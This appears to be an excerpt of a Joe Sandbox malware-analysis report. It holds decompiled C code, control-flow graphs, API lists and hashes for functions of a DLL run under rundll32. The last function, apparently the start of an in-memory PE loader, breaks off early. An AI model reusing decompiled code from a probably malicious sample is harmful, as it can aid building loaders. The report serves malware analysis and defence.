							_t49 = GlobalAlloc(2, _t71 << 3); // executed
						}
						if(_t49 != 0) {
							_t50 = GlobalLock(_t49);
							_t26 = _t85 + 4; // 0x20
							_v12 = _t50;
							E10011C50(_t50 +  *_t26 * 8, 0, _t71 -  *_t26 << 3);
							 *(_t85 + 4) = _t71;
							 *(_t85 + 0x10) = _v12;
							goto L19;
						} else {
							_t24 = _t85 + 0x10; // 0x3192628
							_t87 =  *_t24;
							if(_t87 != 0) {
								GlobalLock(GlobalHandle(_t87));
							}
							LeaveCriticalSection(_v8);
							_push(_t89);
							_t91 = _t94;
							_push(_t73);
							_v32 = 0x1004d418;
							E10011C0F( &_v32, 0x10045dc0);
							asm("int3");
							_push(_t91);
							_t92 = _t94;
							_push(_t73);
							_v40 = 0x1004d4b0;
							E10011C0F( &_v40, 0x10045e04);
							asm("int3");
							_push(_t92);
							_push(_t73);
							_v48 = 0x1004d548;
							E10011C0F( &_v48, 0x10045e48);
							asm("int3");
							return _t73[0x70];
						}
					} else {
						_t17 = _t85 + 0x10; // 0x3192628
						_t73 =  *_t17 + 8;
						while(( *_t73 & 0x00000001) != 0) {
							_t82 = _t82 + 1;
							_t73 =  &(_t73[8]);
							if(_t82 < _t43) {
								continue;
							}
							break;
						}
						if(_t82 < _t43) {
							goto L19;
						} else {
							goto L11;
						}
					}
				} else {
					_t12 = __esi + 0x10; // 0x3192628
					__ecx =  *_t12;
					if(( *( *_t12 + __edi * 8) & 0x00000001) == 0) {
						L19:
						_t33 = _t85 + 0xc; // 0x3
						if(_t82 >=  *_t33) {
							_t34 = _t82 + 1; // 0x4
							 *((intOrPtr*)(_t85 + 0xc)) = _t34;
						}
						_t36 = _t85 + 0x10; // 0x3192628
						 *( *_t36 + _t82 * 8) =  *( *_t36 + _t82 * 8) | 0x00000001;
						_t40 = _t82 + 1; // 0x4
						 *((intOrPtr*)(_t85 + 8)) = _t40;
						LeaveCriticalSection(_v8);
						return _t82;
					} else {
						goto L6;
					}
				}
			}

























                                                                        0x10037446
                                                                        0x10037447
                                                                        0x10037449
                                                                        0x1003744a
                                                                        0x1003744d
                                                                        0x1003744f
                                                                        0x1003744f
                                                                        0x10037454
                                                                        0x10037457
                                                                        0x1003745d
                                                                        0x1003745d
                                                                        0x10037460
                                                                        0x10037465
                                                                        0x10037474
                                                                        0x10037476
                                                                        0x10037479
                                                                        0x10037496
                                                                        0x10037496
                                                                        0x10037496
                                                                        0x10037499
                                                                        0x10037499
                                                                        0x1003749e
                                                                        0x100374b1
                                                                        0x100374b8
                                                                        0x100374bb
                                                                        0x100374cf
                                                                        0x100374a0
                                                                        0x100374a8
                                                                        0x100374a8
                                                                        0x100374d7
                                                                        0x100374fd
                                                                        0x10037503
                                                                        0x1003750e
                                                                        0x10037517
                                                                        0x10037522
                                                                        0x10037525
                                                                        0x00000000
                                                                        0x100374d9
                                                                        0x100374d9
                                                                        0x100374d9
                                                                        0x100374de
                                                                        0x100374e8
                                                                        0x100374e8
                                                                        0x100374f1
                                                                        0x1001ce3b
                                                                        0x1001ce3c
                                                                        0x1001ce3e
                                                                        0x1001ce48
                                                                        0x1001ce4f
                                                                        0x1001ce54
                                                                        0x1001ce55
                                                                        0x1001ce56
                                                                        0x1001ce58
                                                                        0x1001ce62
                                                                        0x1001ce69
                                                                        0x1001ce6e
                                                                        0x1001ce6f
                                                                        0x1001ce72
                                                                        0x1001ce7c
                                                                        0x1001ce83
                                                                        0x1001ce88
                                                                        0x1001ce8c
                                                                        0x1001ce8c
                                                                        0x1003747b
                                                                        0x1003747b
                                                                        0x1003747e
                                                                        0x10037481
                                                                        0x10037486
                                                                        0x10037487
                                                                        0x1003748c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1003748c
                                                                        0x10037490
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10037490
                                                                        0x10037467
                                                                        0x10037467
                                                                        0x10037467
                                                                        0x1003746e
                                                                        0x10037528
                                                                        0x10037528
                                                                        0x1003752b
                                                                        0x1003752d
                                                                        0x10037530
                                                                        0x10037530
                                                                        0x10037533
                                                                        0x1003753c
                                                                        0x1003753f
                                                                        0x10037542
                                                                        0x10037545
                                                                        0x10037551
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1003746e

                                                                        APIs
                                                                        • EnterCriticalSection.KERNEL32(1004F010,?,?,00000000,1004EFF4,1004EFF4,?,10037895,?,?,?,100373C4,100347FD,100071DC), ref: 10037457
                                                                        • GlobalAlloc.KERNEL32(00000002,00000040,?,?,00000000,1004EFF4,1004EFF4,?,10037895,?,?,?,100373C4,100347FD,100071DC), ref: 100374A8
                                                                        • GlobalHandle.KERNEL32(03192628), ref: 100374B1
                                                                        • GlobalUnlock.KERNEL32(00000000,?,?,00000000,1004EFF4,1004EFF4,?,10037895,?,?,?,100373C4,100347FD,100071DC), ref: 100374BB
                                                                        • GlobalReAlloc.KERNEL32 ref: 100374CF
                                                                        • GlobalHandle.KERNEL32(03192628), ref: 100374E1
                                                                        • GlobalLock.KERNEL32 ref: 100374E8
                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,00000000,1004EFF4,1004EFF4,?,10037895,?,?,?,100373C4,100347FD,100071DC), ref: 100374F1
                                                                        • GlobalLock.KERNEL32 ref: 100374FD
                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 10037545
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock
                                                                        • String ID:
                                                                        • API String ID: 2667261700-0
                                                                        • Opcode ID: 661af4af1c470273655f88639a090255be8a6425e96f2dd72de6a9e2d944d7f4
                                                                        • Instruction ID: feedd15bf3e86fe32dc878be1727d2ab34921a7f2ef65c1774b7ebc5d14265f1
                                                                        • Opcode Fuzzy Hash: 661af4af1c470273655f88639a090255be8a6425e96f2dd72de6a9e2d944d7f4
                                                                        • Instruction Fuzzy Hash: 8231AB71A00759AFD722CFB5CC88E5ABBF9FB44241B018929E896DB622D730F900CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1001614C Relevance: 7.7, APIs: 5, Instructions: 172COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 91 1001614c-1001615e call 100107b6 94 10016160-10016163 91->94 95 10016168-1001617d 91->95 96 10016345-10016349 94->96 97 1001619d-1001619f 95->97 98 100161a1-100161b5 GetStartupInfoA 97->98 99 1001617f-10016197 97->99 100 100162a4 98->100 101 100161bb-100161c1 98->101 99->97 103 100162a6-100162b5 100->103 101->100 102 100161c7-100161da 101->102 104 100161dc 102->104 105 100161de-100161e4 102->105 106 100162b7-100162bd 103->106 107 10016326 103->107 104->105 108 10016234-10016238 105->108 109 100161e6 105->109 111 100162c9-100162d0 106->111 112 100162bf-100162c2 106->112 110 1001632a-1001632e 107->110 108->100 114 1001623a-10016243 108->114 115 100161eb-100161f4 call 100107b6 109->115 110->103 116 10016334-10016340 SetHandleCount 110->116 113 100162d3-100162df GetStdHandle 111->113 112->113 118 100162e1-100162ea GetFileType 113->118 119 10016320-10016324 113->119 120 10016245-1001624b 114->120 121 10016299-100162a2 114->121 130 100161f6-10016205 115->130 131 1001622e 115->131 117 10016342-10016344 116->117 117->96 118->119 123 100162ec-100162f6 118->123 119->110 120->121 124 1001624d-10016250 120->124 121->100 121->114 126 100162f8-100162fc 123->126 127 100162fe-10016301 123->127 128 10016252-1001625b GetFileType 124->128 129 1001625d-10016294 call 10019599 124->129 132 10016307-10016319 call 10019599 126->132 127->132 133 10016303 127->133 128->121 128->129 142 100162c4-100162c7 129->142 143 10016296 129->143 135 1001621d-1001621f 130->135 131->108 132->142 144 1001631b-1001631e 132->144 133->132 138 10016221-1001622a 135->138 139 10016207-1001621b 135->139 138->115 140 1001622c 138->140 139->135 140->108 142->117 143->121 144->110
                                                                        C-Code - Quality: 96%
                                                                        			E1001614C() {
				void* __ebp;
				signed int _t51;
				signed int _t55;
				long _t59;
				signed int _t61;
				signed int _t62;
				signed int _t64;
				signed int _t65;
				void* _t69;
				signed int* _t78;
				signed int _t81;
				signed int _t82;
				signed int _t84;
				signed int _t85;
				signed int _t86;
				signed char _t89;
				signed int _t96;
				void* _t99;
				int _t101;
				void** _t103;
				void** _t105;
				signed int** _t106;
				intOrPtr* _t109;
				void* _t110;

				_t51 = E100107B6(0x480);
				if(_t51 != 0) {
					 *0x1004f920 = _t51;
					 *0x1004f90c = 0x20;
					_t1 = _t51 + 0x480; // 0x480
					_t84 = _t1;
					while(1) {
						__eflags = _t51 - _t84;
						if(_t51 >= _t84) {
							break;
						}
						 *_t51 =  *_t51 | 0xffffffff;
						 *(_t51 + 8) =  *(_t51 + 8) & 0x00000000;
						 *((char*)(_t51 + 4)) = 0;
						 *((char*)(_t51 + 5)) = 0xa;
						_t85 =  *0x1004f920; // 0x0
						_t51 = _t51 + 0x24;
						_t84 = _t85 + 0x480;
						__eflags = _t84;
					}
					GetStartupInfoA(_t110 + 0x14);
					__eflags =  *((short*)(_t110 + 0x46));
					if( *((short*)(_t110 + 0x46)) == 0) {
						L26:
						_t81 = 0;
						__eflags = 0;
						do {
							_t86 =  *0x1004f920; // 0x0
							_t103 = _t86 + (_t81 + _t81 * 8) * 4;
							__eflags =  *_t103 - 0xffffffff;
							if( *_t103 != 0xffffffff) {
								_t49 =  &(_t103[1]);
								 *_t49 = _t103[1] | 0x00000080;
								__eflags =  *_t49;
								goto L42;
							}
							__eflags = _t81;
							_t103[1] = 0x81;
							if(_t81 != 0) {
								asm("sbb eax, eax");
								_t59 =  ~(_t81 - 1) + 0xfffffff5;
								__eflags = _t59;
							} else {
								_t59 = 0xfffffff6;
							}
							_t99 = GetStdHandle(_t59);
							__eflags = _t99 - 0xffffffff;
							if(_t99 == 0xffffffff) {
								L40:
								_t103[1] = _t103[1] | 0x00000040;
							} else {
								_t61 = GetFileType(_t99); // executed
								__eflags = _t61;
								if(_t61 == 0) {
									goto L40;
								}
								_t62 = _t61 & 0x000000ff;
								__eflags = _t62 - 2;
								 *_t103 = _t99;
								if(__eflags != 0) {
									__eflags = _t62 - 3;
									if(__eflags == 0) {
										_t42 =  &(_t103[1]);
										 *_t42 = _t103[1] | 0x00000008;
										__eflags =  *_t42;
									}
								} else {
									_t103[1] = _t103[1] | 0x00000040;
								}
								_push(0xfa0);
								_push( &(_t103[3]));
								_t64 = E10019599(__eflags);
								__eflags = _t64;
								if(_t64 == 0) {
									L30:
									_t55 = _t64 | 0xffffffff;
									L44:
									return _t55;
								} else {
									_t103[2] = _t103[2] + 1;
									goto L42;
								}
							}
							L42:
							_t81 = _t81 + 1;
							__eflags = _t81 - 3;
						} while (_t81 < 3);
						SetHandleCount( *0x1004f90c);
						_t55 = 0;
						__eflags = 0;
						goto L44;
					}
					_t65 =  *(_t110 + 0x48);
					__eflags = _t65;
					if(_t65 == 0) {
						goto L26;
					}
					_t101 =  *_t65;
					_t109 = _t65 + 4;
					 *(_t110 + 0x10) = _t101 + _t109;
					__eflags = _t101 - 0x800;
					if(_t101 >= 0x800) {
						_t101 = 0x800;
					}
					__eflags =  *0x1004f90c - _t101; // 0x20
					if(__eflags >= 0) {
						L18:
						_t82 = 0;
						__eflags = _t101;
						if(_t101 <= 0) {
							goto L26;
						} else {
							goto L19;
						}
						do {
							L19:
							_t69 =  *( *(_t110 + 0x10));
							__eflags = _t69 - 0xffffffff;
							if(_t69 == 0xffffffff) {
								goto L25;
							}
							_t89 =  *_t109;
							__eflags = _t89 & 0x00000001;
							if((_t89 & 0x00000001) == 0) {
								goto L25;
							}
							__eflags = _t89 & 0x00000008;
							if(__eflags != 0) {
								L23:
								_t105 = 0x1004f920[_t82 >> 5] + ((_t82 & 0x0000001f) + (_t82 & 0x0000001f) * 8) * 4;
								 *_t105 =  *( *(_t110 + 0x10));
								_t105[1] =  *_t109;
								_push(0xfa0);
								_push( &(_t105[3]));
								_t64 = E10019599(__eflags);
								__eflags = _t64;
								if(_t64 == 0) {
									goto L30;
								}
								_t31 =  &(_t105[2]);
								 *_t31 = _t105[2] + 1;
								__eflags =  *_t31;
								goto L25;
							}
							__eflags = GetFileType(_t69);
							if(__eflags == 0) {
								goto L25;
							}
							goto L23;
							L25:
							 *(_t110 + 0x10) =  &(( *(_t110 + 0x10))[1]);
							_t82 = _t82 + 1;
							_t109 = _t109 + 1;
							__eflags = _t82 - _t101;
						} while (_t82 < _t101);
						goto L26;
					} else {
						_t106 = 0x1004f924;
						while(1) {
							_t78 = E100107B6(0x480);
							__eflags = _t78;
							if(_t78 == 0) {
								break;
							}
							 *0x1004f90c =  *0x1004f90c + 0x20;
							 *_t106 = _t78;
							_t12 =  &(_t78[0x120]); // 0x480
							_t96 = _t12;
							while(1) {
								__eflags = _t78 - _t96;
								if(_t78 >= _t96) {
									break;
								}
								 *_t78 =  *_t78 | 0xffffffff;
								_t78[2] = _t78[2] & 0x00000000;
								_t78[1] = 0;
								_t78[1] = 0xa;
								_t78 =  &(_t78[9]);
								_t96 =  &(( *_t106)[0x120]);
								__eflags = _t96;
							}
							_t106 =  &(_t106[1]);
							__eflags =  *0x1004f90c - _t101; // 0x20
							if(__eflags < 0) {
								continue;
							}
							goto L18;
						}
						_t101 =  *0x1004f90c; // 0x20
						goto L18;
					}
				}
				return _t51 | 0xffffffff;
			}



























                                                                        0x10016156
                                                                        0x1001615e
                                                                        0x10016168
                                                                        0x1001616d
                                                                        0x10016177
                                                                        0x10016177
                                                                        0x1001619d
                                                                        0x1001619d
                                                                        0x1001619f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001617f
                                                                        0x10016182
                                                                        0x10016186
                                                                        0x1001618a
                                                                        0x1001618e
                                                                        0x10016194
                                                                        0x10016197
                                                                        0x10016197
                                                                        0x10016197
                                                                        0x100161a9
                                                                        0x100161af
                                                                        0x100161b5
                                                                        0x100162a4
                                                                        0x100162a4
                                                                        0x100162a4
                                                                        0x100162a6
                                                                        0x100162a6
                                                                        0x100162af
                                                                        0x100162b2
                                                                        0x100162b5
                                                                        0x10016326
                                                                        0x10016326
                                                                        0x10016326
                                                                        0x00000000
                                                                        0x10016326
                                                                        0x100162b7
                                                                        0x100162b9
                                                                        0x100162bd
                                                                        0x100162ce
                                                                        0x100162d0
                                                                        0x100162d0
                                                                        0x100162bf
                                                                        0x100162c1
                                                                        0x100162c1
                                                                        0x100162da
                                                                        0x100162dc
                                                                        0x100162df
                                                                        0x10016320
                                                                        0x10016320
                                                                        0x100162e1
                                                                        0x100162e2
                                                                        0x100162e8
                                                                        0x100162ea
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100162ec
                                                                        0x100162f1
                                                                        0x100162f4
                                                                        0x100162f6
                                                                        0x100162fe
                                                                        0x10016301
                                                                        0x10016303
                                                                        0x10016303
                                                                        0x10016303
                                                                        0x10016303
                                                                        0x100162f8
                                                                        0x100162f8
                                                                        0x100162f8
                                                                        0x1001630a
                                                                        0x1001630f
                                                                        0x10016310
                                                                        0x10016315
                                                                        0x10016319
                                                                        0x100162c4
                                                                        0x100162c4
                                                                        0x10016342
                                                                        0x00000000
                                                                        0x1001631b
                                                                        0x1001631b
                                                                        0x00000000
                                                                        0x1001631b
                                                                        0x10016319
                                                                        0x1001632a
                                                                        0x1001632a
                                                                        0x1001632b
                                                                        0x1001632b
                                                                        0x1001633a
                                                                        0x10016340
                                                                        0x10016340
                                                                        0x00000000
                                                                        0x10016340
                                                                        0x100161bb
                                                                        0x100161bf
                                                                        0x100161c1
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100161c7
                                                                        0x100161c9
                                                                        0x100161cf
                                                                        0x100161d8
                                                                        0x100161da
                                                                        0x100161dc
                                                                        0x100161dc
                                                                        0x100161de
                                                                        0x100161e4
                                                                        0x10016234
                                                                        0x10016234
                                                                        0x10016236
                                                                        0x10016238
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001623a
                                                                        0x1001623a
                                                                        0x1001623e
                                                                        0x10016240
                                                                        0x10016243
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10016245
                                                                        0x10016248
                                                                        0x1001624b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001624d
                                                                        0x10016250
                                                                        0x1001625d
                                                                        0x10016271
                                                                        0x1001627a
                                                                        0x1001627f
                                                                        0x10016285
                                                                        0x1001628a
                                                                        0x1001628b
                                                                        0x10016290
                                                                        0x10016294
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10016296
                                                                        0x10016296
                                                                        0x10016296
                                                                        0x00000000
                                                                        0x10016296
                                                                        0x10016259
                                                                        0x1001625b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10016299
                                                                        0x10016299
                                                                        0x1001629e
                                                                        0x1001629f
                                                                        0x100162a0
                                                                        0x100162a0
                                                                        0x00000000
                                                                        0x100161e6
                                                                        0x100161e6
                                                                        0x100161eb
                                                                        0x100161ec
                                                                        0x100161f1
                                                                        0x100161f4
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100161f6
                                                                        0x100161fd
                                                                        0x100161ff
                                                                        0x100161ff
                                                                        0x1001621d
                                                                        0x1001621d
                                                                        0x1001621f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10016207
                                                                        0x1001620a
                                                                        0x1001620e
                                                                        0x10016212
                                                                        0x10016218
                                                                        0x1001621b
                                                                        0x1001621b
                                                                        0x1001621b
                                                                        0x10016221
                                                                        0x10016224
                                                                        0x1001622a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001622c
                                                                        0x1001622e
                                                                        0x00000000
                                                                        0x1001622e
                                                                        0x100161e4
                                                                        0x00000000

                                                                        APIs
                                                                        • GetStartupInfoA.KERNEL32(?), ref: 100161A9
                                                                        • GetFileType.KERNEL32(?), ref: 10016253
                                                                        • GetStdHandle.KERNEL32(-000000F6), ref: 100162D4
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: FileHandleInfoStartupType
                                                                        • String ID:
                                                                        • API String ID: 2461013171-0
                                                                        • Opcode ID: 2a11ebc9d7fb6060b117caf8eeb261201d5d861bf5ae3b3f6147b5d07e97c54e
                                                                        • Instruction ID: 1ab9cbaac9cb8a736ff2886ec947831f70add154915b3c09dc4dcc7ccc4cd674
                                                                        • Opcode Fuzzy Hash: 2a11ebc9d7fb6060b117caf8eeb261201d5d861bf5ae3b3f6147b5d07e97c54e
                                                                        • Instruction Fuzzy Hash: 6C51F4716057429FD710CF68CC887267BE0EB4A364F258A6DD5A5CF2E2D734E889CB01
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10013AD4 Relevance: 7.5, APIs: 5, Instructions: 40memoryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 145 10013ad4-10013adb 146 10013b46-10013b52 HeapDestroy 145->146 147 10013add-10013aed 145->147 148 10013b34-10013b45 HeapFree 147->148 149 10013aef-10013afd 147->149 148->146 150 10013b00-10013b30 VirtualFree * 2 HeapFree 149->150 150->150 151 10013b32-10013b33 150->151 151->148
                                                                        C-Code - Quality: 100%
                                                                        			E10013AD4() {
				int _t2;
				void* _t8;
				void* _t14;
				void** _t15;
				void* _t21;
				void* _t23;

				if( *0x10050a64 == 3) {
					_t8 = 0;
					_t21 =  *0x10050a48 - _t8; // 0x0
					if(_t21 > 0) {
						_t14 =  *0x10050a4c; // 0x0
						_t15 = _t14 + 0xc;
						do {
							VirtualFree( *_t15, 0x100000, 0x4000);
							VirtualFree( *_t15, 0, 0x8000);
							HeapFree( *0x10050a60, 0, _t15[1]);
							_t15 =  &(_t15[5]);
							_t8 = _t8 + 1;
							_t23 = _t8 -  *0x10050a48; // 0x0
						} while (_t23 < 0);
					}
					HeapFree( *0x10050a60, 0,  *0x10050a4c);
				}
				_t2 = HeapDestroy( *0x10050a60); // executed
				return _t2;
			}









                                                                        0x10013adb
                                                                        0x10013ade
                                                                        0x10013ae0
                                                                        0x10013aed
                                                                        0x10013af0
                                                                        0x10013afd
                                                                        0x10013b00
                                                                        0x10013b0c
                                                                        0x10013b17
                                                                        0x10013b24
                                                                        0x10013b26
                                                                        0x10013b29
                                                                        0x10013b2a
                                                                        0x10013b2a
                                                                        0x10013b33
                                                                        0x10013b42
                                                                        0x10013b45
                                                                        0x10013b4c
                                                                        0x10013b52

                                                                        APIs
                                                                        • VirtualFree.KERNEL32(-0000000C,00100000,00004000,00000000,?,?,?,100112B9,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10013B0C
                                                                        • VirtualFree.KERNEL32(-0000000C,00000000,00008000,?,?,100112B9,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10013B17
                                                                        • HeapFree.KERNEL32(00000000,?,?,?,100112B9,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10013B24
                                                                        • HeapFree.KERNEL32(00000000,?,?,100112B9,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10013B42
                                                                        • HeapDestroy.KERNELBASE(100112B9,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10013B4C
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Free$Heap$Virtual$Destroy
                                                                        • String ID:
                                                                        • API String ID: 782257640-0
                                                                        • Opcode ID: 8f6c8d7fc22e07898a61e37111d0c0b64a3083a977e6fea9273e17b92621faf8
                                                                        • Instruction ID: ae232e1038543a87835a4795d6aa86e40daf30d89f668916441cffa0c1b4fc0d
                                                                        • Opcode Fuzzy Hash: 8f6c8d7fc22e07898a61e37111d0c0b64a3083a977e6fea9273e17b92621faf8
                                                                        • Instruction Fuzzy Hash: 81F0493AA00328AFFB21DF15DCC5F0ABB75F741754F258024F6456A4B2C6B36850EB19
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10005260 Relevance: 7.1, APIs: 4, Instructions: 1092memoryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 152 10005260-1000530c 153 10006011-1000601a 152->153 154 10005312-10005361 152->154 154->153 155 10005367-10005409 154->155 155->153 156 1000540f-10005488 155->156 156->153 157 1000548e-100054cb 156->157 157->153 158 100054d1-10005505 157->158 158->153 159 1000550b-10005594 158->159 160 1000559a-100055be 159->160 161 100056bc-100056c2 159->161 162 100055c4-100055d1 160->162 163 100056c8-10005803 GetNativeSystemInfo call 10002bf0 * 2 161->163 164 100055d3-10005602 162->164 165 10005604-10005642 162->165 163->153 174 10005809-10005914 163->174 167 10005644-10005654 164->167 165->167 169 10005656-10005697 167->169 170 10005699 167->170 173 1000569f-100056b4 169->173 170->173 173->162 175 100056ba 173->175 177 10005a04-10005a9b GetProcessHeap HeapAlloc 174->177 178 1000591a-100059fc 174->178 175->163 179 10005ae8-10005bdd call 10002c60 177->179 180 10005a9d-10005ae7 177->180 178->153 183 10005a02 178->183 186 10005be3-10005e5a memcpy call 10002ca0 179->186 187 10006008-1000600e call 10004dd0 179->187 183->177 186->187 193 10005e60-10005ec1 186->193 187->153 194 10005ec7-10005f56 call 10003b80 193->194 195 10005f58 193->195 197 10005f5f-10005f91 call 10003f40 194->197 195->197 197->187 201 10005f93-10005fd6 call 10003570 197->201 203 10005fdb-10005fe0 201->203 203->187 204 10005fe2-10006006 call 10003ad0 203->204 204->187 207 1000601b-10006026 204->207 208 1000602c-10006031 207->208 209 1000610d-1000611d 207->209 210 10006033-100060a4 208->210 211 100060a5-1000610c 208->211
                                                                        C-Code - Quality: 73%
                                                                        			E10005260() {
				signed int _t340;
				signed int _t351;
				signed int _t354;
				signed int _t356;
				signed int _t360;
				void* _t373;
				signed int _t385;
				signed int _t388;
				signed int _t398;
				signed int _t403;
				intOrPtr _t405;
				void* _t410;
				signed int _t411;
				signed int _t412;
				signed int _t413;
				signed int _t423;
				signed int _t425;
				void* _t433;
				signed int _t436;
				signed int _t437;
				signed int _t438;
				void* _t441;
				signed int _t442;
				signed int _t444;
				signed int _t448;
				intOrPtr _t453;
				signed int _t454;
				signed int _t463;
				void* _t467;
				signed int _t468;
				signed int _t469;
				void* _t473;
				signed int _t474;
				void* _t475;
				void* _t476;
				intOrPtr _t478;
				signed int _t481;
				void* _t492;
				signed int _t498;
				signed int _t520;
				intOrPtr _t523;
				signed int _t532;
				signed int _t533;
				signed short* _t542;
				signed int _t545;
				signed int _t563;
				signed int _t571;
				signed int _t579;
				signed int _t580;
				signed int _t583;
				intOrPtr _t585;
				signed int _t587;
				signed int _t590;
				signed int _t604;
				signed int _t624;
				intOrPtr _t636;
				signed int _t637;
				signed int _t642;
				signed int _t665;
				signed int _t668;
				signed int _t673;
				signed int _t691;
				signed int _t692;
				signed int _t706;
				signed int _t707;
				signed int _t716;
				signed int _t717;
				signed int _t722;
				signed int _t726;
				signed int _t731;
				signed int _t732;
				signed int _t733;
				signed int _t736;
				signed int _t738;
				signed int _t739;
				signed int _t743;
				signed int _t752;
				signed int _t754;
				signed int _t756;
				signed int _t759;
				signed int _t761;
				signed int _t765;
				signed int _t766;
				signed int _t770;
				signed int _t778;
				signed int _t780;
				signed int _t789;
				signed int _t795;
				signed int _t836;
				signed int _t840;
				signed int _t841;
				signed int _t853;
				signed int _t867;
				signed int _t888;
				signed int _t890;
				signed int _t891;
				signed int _t895;
				signed int _t900;
				signed int _t903;
				signed int _t905;
				signed int _t907;
				signed int _t913;
				signed int _t918;
				signed int _t921;
				signed int _t924;
				signed int _t928;
				signed int _t930;
				signed int _t932;
				signed int _t933;
				signed int _t934;
				signed int _t941;
				intOrPtr* _t951;
				signed int _t954;
				signed int _t955;
				signed int _t956;
				signed int _t962;
				signed int _t963;
				signed int _t970;
				signed int _t971;
				signed int _t981;
				signed int _t988;
				signed int _t989;
				signed int _t995;
				signed int _t1035;
				signed int _t1041;
				signed int _t1042;
				signed int _t1043;
				signed short _t1049;
				signed int _t1050;
				signed int _t1051;
				signed int _t1064;
				intOrPtr* _t1066;
				signed int _t1067;
				signed int _t1075;
				signed int _t1076;
				signed int _t1084;
				signed int _t1085;
				signed int _t1086;
				signed int _t1091;
				signed int _t1094;
				signed int _t1097;
				signed int _t1126;
				signed int _t1128;
				signed int _t1132;
				signed int _t1135;
				signed int _t1138;
				signed int _t1153;
				signed int _t1165;
				signed int _t1166;
				signed int _t1167;
				intOrPtr* _t1168;
				signed int _t1169;
				signed int _t1170;
				signed int _t1174;
				signed int _t1184;
				signed int _t1187;
				signed int _t1200;
				void* _t1202;
				signed int _t1227;
				signed int _t1237;
				void* _t1248;
				void* _t1249;
				void* _t1250;
				void* _t1251;

				_t691 =  *0x1004b0ec; // 0x0
				_t340 =  *0x1004b0e4; // 0x0
				_t981 =  *0x1004b0e0; // 0x0
				_t932 =  *0x1004b0d8; // 0x0
				_t795 =  *0x1004b0dc; // 0x0
				_t933 =  *0x1004b0e8; // 0x0
				_t4 = _t981 * _t933 + 2; // 0x2
				_t5 = _t795 + 0x3fffffff; // 0x3fffffff
				_t6 = _t691 + 0x3fffffff; // 0x3fffffff
				_t934 =  *0x1004b0e0; // 0x0
				_t532 =  *0x1004b0d8; // 0x0
